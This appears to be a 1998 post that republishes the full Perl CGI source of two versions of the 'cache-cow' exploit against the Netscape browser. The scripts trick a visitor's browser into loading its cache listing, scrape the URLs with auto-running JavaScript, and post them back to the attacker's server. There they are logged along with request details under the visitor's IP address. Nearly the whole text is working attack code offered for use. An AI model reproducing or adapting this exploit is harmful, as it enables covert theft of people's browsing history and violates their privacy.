Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve
<nothing@shout.net>, as found on his web site at
http://www.shout.net/~nothing/cache-cow/index.html

First version <cache-cow.cgi>, and then second version
<view-cache-cow-4.06.cgi> listed.

-----snip-----
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing@shout.net>, 1998.08.23

my $self = "http://www.shout.net/nothing/cache-cow.cgi";

if ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  (my$url=<<"  EOF")=~s/  |\n//g;print"Location: $url\n\n";
  $self/></a></body><script>function chunk(s){return("href=
  "+escape(s));}function moo(){if(!document.links.length){r
  eturn("");}var str=chunk(document.links[0]);var i=documen
  t.links.length;while(--i){str+="&"+chunk(document.links[i
  ]);}return(str);}</script><body onLoad="document.f.cache.
  value=moo();document.f.submit()"><form action="$self" nam
  e=f method=post><input type=hidden name=cache><input type
  =submit></form><a href=$self
  EOF
}

exit 0;
-----snip-----


-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing@shout.net>, 1998.09.26

my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";

if ($ENV{QUERY_STRING}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><head><script>function chunk(s){return("href=" + escape(s));}
  function moo(d){if(!d.l  inks.length){return("");} var str=chunk(d.
  links[0]);var i=d.links.length;wh  ile(--i){str+="&"+chunk(d.links[
  i]);} return(s  tr);}function check(){ var m=moo(top.cache.document
  ); if (m=="") { docume  nt.location.reload(); return; }document.f.c
  ache.value=m;doc  ument.f.submit();}</script></head><body onLoad="c
  heck()"><form acti  on="$self" name=f target=_top method=post><inpu
  t type=hidden name=cac  he><input type=submit></form></body></html>
  EOF
} elsif ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  print"Content-type: text/html\n\n".<<"  EOF";
  <html><head> <frameset rows="1,*"><frame src=
  "$self?cow" name=cow><frame src="$self/cache"
  name=cache></frameset></head></html>
  EOF
}

exit 0;
-----snip-----